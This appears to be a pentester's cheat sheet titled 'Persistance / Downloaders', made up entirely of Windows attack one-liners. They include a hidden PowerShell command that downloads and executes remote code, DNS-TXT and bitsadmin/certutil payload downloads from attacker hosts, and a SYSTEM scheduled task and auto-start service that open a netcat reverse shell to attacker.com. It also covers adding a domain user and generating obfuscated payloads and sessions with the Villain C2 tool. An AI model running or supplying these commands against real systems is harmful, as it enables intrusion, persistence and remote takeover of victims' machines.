⚓Persistance / Downloaders
Mis à jour
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://<ip>:<port>/<file>'))"powershell.exe (nslookup -q=txt attacker.dns)[-1]bitsadmin /transfer myjob /download /priority high http://attacker.com/nc64.exe c:\temp\nc.execertutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exeschtasks /create /sc minute /mo 1 /tn "eviltask" /tr C:\tools\shell.exe /ru "SYSTEM"> sc create <evilsvc> binpath= "c:\tools\nc attacker.com 443 -e cmd.exe" start= "auto" obj= "LocalSystem" password= ""
> sc start <evilsvc>net user <username> <password> /add /domain$ ./Villain.py
villain > generate os=windows lhost=eth0 obfuscate
villain > sessions
villain > shell <Session ID>